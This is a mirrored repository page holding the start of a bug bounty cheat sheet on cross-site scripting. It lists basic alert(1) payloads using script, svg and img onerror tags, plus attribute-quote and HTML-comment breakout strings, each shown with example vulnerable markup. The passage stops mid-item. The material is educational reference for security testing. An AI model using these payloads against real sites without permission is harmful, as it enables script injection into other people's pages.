ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 18:36:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
474102c656
AllAboutBugBounty/Cross Site Scripting.md
MD15 474102c656 Renaming all files
2021-01-25 06:32:59 +07:00

5.0 KiB
Raw Blame History

XSS Cheat Sheet (Basic)

  1. Basic payload
<script>alert(1)</script>
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
  1. Add ' or " to escape the payload from value of an HTML tag
"><script>alert(1)</script>
'><script>alert(1)</script>
  • Example source code
<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
  • After input the payload
<input id="keyword" type="text" name="q" value=""><script>alert(1)</script>
  1. Add --> to escape the payload if input lands in HTML comments.
--><script>alert(1)</script>
  • Example source code
<!-- REFLECTED_HERE -->
  • After input the payload
<!-- --><script>alert(1)</script> -->
  1. Add when the input inside or between opening/closing tags, tag can be ,<title, when input inside